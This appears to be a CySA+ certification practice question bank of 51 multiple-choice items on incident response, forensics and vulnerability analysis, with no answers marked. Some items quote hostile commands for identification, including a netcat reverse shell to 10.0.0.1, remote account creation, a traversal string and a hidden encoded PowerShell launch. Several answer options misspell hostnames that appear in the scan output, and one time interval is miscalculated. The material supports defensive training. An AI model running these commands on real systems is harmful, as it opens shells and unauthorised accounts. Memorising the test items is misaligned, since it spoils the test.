
CYSA+ 003

Description:
200 to 250 Q&A

Creation Date: 2025/11/06

Category: Others

Number of questions: 51

Content:

An analyst is imaging a hard drive that was obtained from the system of an employee who is suspected of going rogue. The analyst notes that the initial hash of the evidence drive does not match the resultant hash of the imaged copy. Which of the following best describes the reason for the conflicting investigative findings?
- Chain of custody was not maintained for the evidence drive.
- Legal authorization was not obtained prior to seizing the evidence drive.
- Data integrity of the imaged drive could not be verified.
- Evidence drive imaging was performed without a write blocker.

The analyst reviews the following endpoint log entry:

    invoke-command -ComputerName clientcomputer1 -Credential xyzcompany\administrator -ScriptBlock {HOSTName}
    clientcomputer1
    invoke-command -ComputerName clientcomputer1 -Credential xyzcompany\administrator -ScriptBlock {net user /add invoke_u1}
    The command completed successfully.

Which of the following has occurred?
- Registry change.
- Rename computer.
- New account introduced.
- Privilege escalation.

A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path traversal, and cross-site scripting. Which of the following tools would the security team most likely recommend to perform this test?
- Hashcat.
- OpenVAS.
- OWASP ZAP.
- Nmap.

A security analyst detected the following suspicious activity:

    rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f

Which of the following most likely describes the activity?
- Network pivoting.
- Host scanning.
- Privilege escalation.
- Reverse shell.

An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party that the message came from the sender. Which of the following information security goals is the analyst most likely trying to achieve?
- Non-repudiation.
- Authentication.
- Authorization.
- Integrity.

Before adopting a disaster recovery plan, some team members need to gather in a room to review the written scenarios. Which of the following best describes what the team is doing?
- Simulation.
- Tabletop exercise.
- Full test.
- Parallel test.

Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the general public, as a best practice?
- Law enforcement and Governance.
- Legal and Public relations.
- Manager and Public relations.
- Human resources and Manager.

Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported?
- Signal-shielded bag and Tamper-evident seal.
- Thumb drive and Crime scene tape.
- Write blocker and Drive duplicator.

During the rollout of a patch to the production environment, it was discovered that required connections to remote systems are no longer possible. Which of the following steps would have most likely revealed this gap?
- Implementation.
- User acceptance testing.
- Validation.
- Rollback.

An organization has tracked several incidents that are listed in the following table:

    Start time   Detection time   Time elapsed in minutes
    7:20 a.m.    10:30 a.m.       180
    12:00 a.m.   2:30 a.m.        150
    9:25 a.m.    12:15 p.m.       170
    3:25 p.m.    5:45 p.m.        140

Which of the following is the organization’s MTTD?
- 140.
- 150.
- 160.
- 180.

A security analyst has found a moderate-risk item in an organization’s point-of-sale application. The organization is currently in a change freeze window and has decided that the risk is not high enough to correct at this time. Which of the following inhibitors to remediation does this scenario illustrate?
- Service-level agreement.
- Business process interruption.
- Degrading functionality.
- Proprietary system.

While reviewing the web server logs, a security analyst notices the following snippet:

    ..\../..\../boot.ini

Which of the following is being attempted?
- Directory traversal.
- Remote file inclusion.
- Cross-site scripting.
- Remote code execution.
- Enumeration of /etc/passwd.

A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?
- Data enrichment.
- Security control plane.
- Threat feed combination.
- Single pane of glass.

Exploit code for a recently disclosed critical software vulnerability was publicly available for download for several days before being removed. Which of the following CVSS v3.1 temporal metrics was most impacted by this exposure?
- Remediation level.
- Exploit code maturity.
- Report confidence.
- Availability.

Which of the following in the digital forensics process is considered a critical activity that often includes a graphical representation of process and operating system events?
- Registry editing.
- Network mapping.
- Timeline analysis.
- Write blocking.

Which of the following best describes the importance of KPIs in an incident response exercise?
- To identify the personal performance of each analyst.
- To describe how incidents were resolved.
- To reveal what the team needs to prioritize.
- To expose which tools should be used.

An organization is conducting a pilot deployment of an e-commerce application. The application’s source code is not available. Which of the following strategies should an analyst recommend to evaluate the security of the software?
- Static testing.
- Vulnerability testing.
- Dynamic testing.
- Penetration testing.

A security team needs to demonstrate how prepared the team is in the event of a cyberattack. Which of the following would best demonstrate a real-world incident without impacting operations?
- Review lessons-learned documentation and create a playbook.
- Gather all internal incident response party members and perform a simulation.
- Deploy known malware and document the remediation process.
- Schedule a system recovery to the DR site for a few applications.

A SOC receives several alerts indicating user accounts are connecting to the company’s identity provider through non-secure communications. User credentials for accessing sensitive, business-critical systems could be exposed. Which of the following logs should the SOC use when determining malicious intent?
- DNS.
- tcpdump.
- Directory.
- IDS.

A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings:

    Vulnerability 1: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    Vulnerability 2: CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H
    Vulnerability 3: CVSS:3.0/AV:A/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L
    Vulnerability 4: CVSS:3.0/AV:P/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:L

Which of the following vulnerabilities should be patched first?
- Vulnerability 1.
- Vulnerability 2.
- Vulnerability 3.
- Vulnerability 4.

Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered. Which of the following is the best solution to decrease the inconsistencies?
- Implementing credentialed scanning.
- Changing from a passive to an active scanning approach.
- Implementing a central place to manage IT assets.
- Performing agentless scanning.

An organization plans to use an advanced machine-learning tool as a central collection server. The tool will perform data aggregation and analysis. Which of the following should the organization implement?
- SIEM.
- Firewalls.
- Syslog server.
- Flow analysis.

A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public MITRE repositories would be best to review?
- Cyber Threat Intelligence.
- Common Vulnerabilities and Exposures.
- Cyber Analytics Repository.
- ATT&CK.

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

    Alerts (17)
    Absence of Anti-CSRF Tokens
    Content Security Policy (CSP) Header Not Set (6)
    Cross-Domain Misconfiguration (34)
    Directory Browsing (11)
    Missing Anti-clickjacking Header (2)
    Cookie No HttpOnly Flag (4)
    Cookie Without Secure Flag
    Cookie with SameSite Attribute None (2)
    Cookie without SameSite Attribute (5)
    Cross-Domain JavaScript Source File Inclusion
    Timestamp Disclosure - Unix (569)
    X-Content-Type-Options Header Missing (42)
    CORS Header
    Information Disclosure - Sensitive Information in URL (2)
    Information Disclosure - Suspicious Comments (43)
    Loosely Scoped Cookie (5)
    Re-examine Cache-control Directives (33)

Which of the following tuning recommendations should the security analyst share?
- Set an HttpOnly flag to force communication by HTTPS.
- Block requests without an X-Frame-Options header.
- Configure an Access-Control-Allow-Origin header to authorized domains.
- Disable the cross-origin resource sharing header.

Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output:

    Nmap scan report for officerokuplayer.lan (192.168.86.22)
    Host is up (0.11s latency).
    All 100 scanned ports on officerokuplayer.lan (192.168.86.22) are filtered
    MAC Address: B8:3E:59:86:1A:13 (Roku)

    Nmap scan report for p4wnpi_aloa.lan (192.168.86.56)
    Host is up (0.022s latency).
    Not shown: 96 closed ports
    PORT     STATE SERVICE
    22/tcp   open  ssh
    111/tcp  open  rpcbind
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    8000/tcp open  http-alt
    MAC Address: B8:27:EB:D0:8E:D1 (Raspberry Pi Foundation)

    Nmap scan report for wh4dc-749gy.lan (192.168.86.152)
    Host is up (0.033s latency).
    Not shown: 95 filtered ports
    PORT     STATE SERVICE
    80/tcp   open  http
    135/tcp  open  msrpc
    139/tcp  open  netbios-ssn
    443/tcp  open  https
    445/tcp  open  microsoft-ds
    3389/tcp open  ms-wbt-server
    5357/tcp open  wsdapi
    MAC Address: 38:BA:F8:E3:41:C5 (Intel Corporate)

    Nmap scan report for xlaptop.lan (192.168.86.249)
    Host is up (0.024s latency).
    Not shown: 93 filtered ports
    PORT     STATE SERVICE
    22/tcp   open  ssh
    135/tcp  open  msrpc
    139/tcp  open  netbios-ssn
    443/tcp  open  https
    445/tcp  open  microsoft-ds
    3389/tcp open  ms-wbt-server
    5357/tcp open  wsdapi
    MAC Address: 64:00:6A:8E:D8:F5 (Dell)

    Nmap scan report for imaging.lan (192.168.86.150)
    Host is up (0.0013s latency).
    Not shown: 95 closed ports
    PORT     STATE SERVICE
    135/tcp  open  msrpc
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    3389/tcp open  ms-wbt-server
    5357/tcp open  wsdapi
    MAC Address: 38:BA:F8:F4:32:CA (Intel Corporate)

- wh4dc-748gy.lan (192.168.86.152).
- officerckuplayer.lan (192.168.86.22).
- imaging.lan (192.168.86.150).
- xlaptop.lan (192.168.86.249).
- p4wnp1_aloa.lan (192.168.86.56).

A corporation wants to implement an agent-based endpoint solution to help:
• Flag various threats
• Review vulnerability feeds
• Aggregate data
• Provide real-time metrics by using scripting languages
Which of the following tools should the corporation implement to reach this goal?
- DLP.
- Heuristics.
- SOAR.
- NAC.

A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following should the SOC manager utilize to improve the process?
- The most recent audit report.
- The incident response playbook.
- The incident response plan.
- The lessons-learned register.

Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-when information and evaluate the effectiveness of the plans in place. Which of the following incident management life cycle processes does this describe?
- Business continuity plan.
- Lessons learned.
- Forensic analysis.
- Incident response plan.

Which of the following most accurately describes the Cyber Kill Chain methodology?
- It is used to correlate events to ascertain the TTPs of an attacker.
- It is used to ascertain lateral movements of an attacker, enabling the process to be stopped.
- It provides a clear model of how an attacker generally operates during an intrusion and the actions to take at each stage.
- It outlines a clear path for determining the relationships between the attacker, the technology used, and the target.

After a recent vulnerability report for a server is presented, a business must decide whether to secure the company’s web-based storefront or shut it down. The developer is not able to fix the zero-day vulnerability because a patch does not exist yet. Which of the following is the best option for the business?
- Limit the API request for new transactions until a patch exists.
- Take the storefront offline until a patch exists.
- Identify the degrading functionality.
- Put a WAF in front of the storefront.

During a tabletop exercise, engineers discovered that an ICS could not be updated due to hardware versioning incompatibility. Which of the following is the most likely cause of this issue?
- Legacy system.
- Business process interruption.
- Degrading functionality.
- Configuration management.

Which of the following is the best reason to implement an MOU?
- To create a business process for configuration management.
- To allow internal departments to understand security responsibilities.
- To allow an expectation process to be defined for legacy systems.
- To ensure that all metrics on service levels are properly reported.

Which of the following documents sets requirements and metrics for a third-party response during an event?
- BIA.
- DRP.
- SLA.
- MOU.

A SOC analyst wants to improve the proactive detection of malicious emails before they are delivered to the destination inbox. Which of the following is the best approach the SOC analyst can recommend?
- Install UEBA software on the network.
- Validate and quarantine emails with invalid DKIM and SPF headers.
- Implement an EDR system on each endpoint.
- Deploy a DLP platform to block unauthorized and suspicious content.

Which of the following is a benefit of the Diamond Model of Intrusion Analysis?
- It provides analytical pivoting and identifies knowledge gaps.
- It guarantees that the discovered vulnerability will not be exploited again in the future.
- It provides concise evidence that can be used in court.
- It allows for proactive detection and analysis of attack events.

When starting an investigation, which of the following must be done first?
- Notify law enforcement.
- Secure the scene.
- Seize all related evidence.
- Interview the witnesses.

An incident responder was able to recover a binary file through the network traffic. The binary file was also found in some machines with anomalous behavior. Which of the following processes most likely can be performed to understand the purpose of the binary file?
- File debugging.
- Traffic analysis.
- Reverse engineering.
- Machine isolation.

A manufacturing company’s assembly line machinery only functions on an end-of-life OS. Consequently, no patches exist for several highly exploitable OS vulnerabilities. Which of the following is the best mitigating control to reduce the risk of these current conditions?
- Enforce strict network segmentation to isolate vulnerable systems from the production network.
- Increase the system resources for vulnerable devices to prevent denial of service.
- Perform penetration testing to verify the exploitability of these vulnerabilities.
- Develop in-house patches to address these vulnerabilities.

Which of the following will most likely cause severe issues with authentication and logging?
- Virtualization.
- Multifactor authentication.
- Federation.
- Time synchronization.

Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hours. After sending a notification to the asset owners, the patch cannot be deployed due to planned, routine system upgrades. Which of the following is the best method to remediate the bugs?
- Reschedule the upgrade and deploy the patch.
- Request an exception to exclude the patch from installation.
- Update the risk register and request a change to the SLA.
- Notify the incident response team and rerun the vulnerability scan.

A company is in the middle of an incident, and customer data has been breached. Which of the following should the company contact first?
- Media.
- Public relations.
- Law enforcement.
- Legal.

A list of IoCs released by a government security organization contains the SHA-256 hash for a Microsoft-signed legitimate binary, svchost.exe. Which of the following best describes the result if security teams add this indicator to their detection signatures?
- This indicator would fire on the majority of Windows devices.
- Malicious files with a matching hash would be detected.
- Security teams would detect rogue svchost.exe processes in their environment.
- Security teams would detect event entries detailing execution of known-malicious svchost.exe processes.

A Chief Information Security Officer wants to lock down the users’ ability to change applications that are installed on their Windows systems. Which of the following is the best enterprise-level solution?
- HIPS.
- GPO.
- Registry.
- DLP.

An employee received a phishing email that contained malware targeting the company. Which of the following is the best way for a security analyst to get more details about the malware and avoid disclosing information?
- Upload the malware to the VirusTotal website.
- Share the malware with the EDR provider.
- Hire an external consultant to perform the analysis.
- Use a local sandbox in a microsegmented environment.

A Chief Finance Officer receives an email from someone who is possibly impersonating the company’s Chief Executive Officer and requesting a financial operation. Which of the following should an analyst use to verify whether the email is an impersonation attempt?
- PKI.
- MFA.
- SMTP.
- DKIM.

An analyst is investigating a phishing incident and has retrieved the following as part of the investigation:

    cmd.exe /c c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -EncodedCommand

Which of the following should the analyst use to gather more information about the purpose of this command?
- Echo the command payload content into 'base64 -d'.
- Execute the command from a Windows VM.
- Use a command console with administrator privileges to execute the code.
- Run the command as an unprivileged user from the analyst workstation.

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?
- The lead should review what is documented in the incident response policy or plan.
- Management level members of the CSIRT should make that decision.
- The lead has the authority to decide who to communicate with at any time.
- Subject matter experts on the team should communicate with others within the specified area of expertise.

An organization’s threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?
- Disable administrative accounts for any operations.
- Implement MFA requirements for all internal resources.
- Harden systems by disabling or removing unnecessary services.
- Implement controls to block execution of untrusted applications.

When undertaking a cloud migration of multiple SaaS applications, an organization’s systems administrators struggled with the complexity of extending identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?
- OpenID.
- SASE.
- ZTNA.
- SWG.

A security analyst reviews the following results of a Nikto scan:

    - Server: Apache
    - Root page / redirects to: https://ww.proz.com/
    - No CGI Directories found (use -C and -f to force check all possible dirs)
    - File/dir '/crawler-pit/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    - File/dir '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    - File/dir '/profile/s/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    - File/dir '/profiles//' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    - File/dir '/profile/?/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    - File/dir '/translator/?/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    - File/dir '/profile/1273295/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    - File/dir '/?sp=login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    - File/dir '/?sp=404/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    - File/dir '/translator/322254/' in robots.txt returned a non-forbidden or redirect HTTP code (500)
    - "robots.txt" contains 10 entries which should be manually viewed.
    - Lines
    - /crossdomain.xml contains 1 line which should be manually viewed for improper domains or wildcards.
    - Server is using a wildcard certificate '*.proz.com'
    - DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
    - /xboard/: XBoard Forum 0.3.0 and error have a security problem in forum_edit.php, forum_post.php and forum_reply.php
    - /lists/admin/: PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login is admin/phplist
    - /splashadmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely.
    - /sxdefs/: Siteseed pre 1.4.2 has 'major' security problems.
    - /sxhome/: Siteseed pre 1.4.2 has 'minor' security problems.
    - /tiki/: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin
    - /tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin
    - /cgi-bin/infosrch.cgi: See RFP 9001: www.wiretrip.net
    - OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DOS was not attempted.
    - OSVDB-637: /-root/: Allowed to browse root's home directory.
    - wti.cgi/warp: cross site IBIX 6.2: allows to view directories
    - /forums//admin/config.php: PHP Config file may contain database IDs and passwords.
    - /forums//adm/config.php: PHP Config file may contain database IDs and passwords
    - /forums//administrator/config.php: PHP Config file may contain database IDs and passwords.

Which of the following should the security administrator investigate next?
- tiki.
- phpList.
- shtml.exe.
- sshome.

Which of the following explains the importance of a timeline when providing an incident response report?
- The timeline contains a real-time record of an incident and provides information that helps to simplify a postmortem analysis.
- An incident timeline provides the necessary information to understand the actions taken to mitigate the threat or risk.
- The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken.
- An incident timeline presents the list of commands executed by an attacker when the system was compromised, in the form of a timetable.
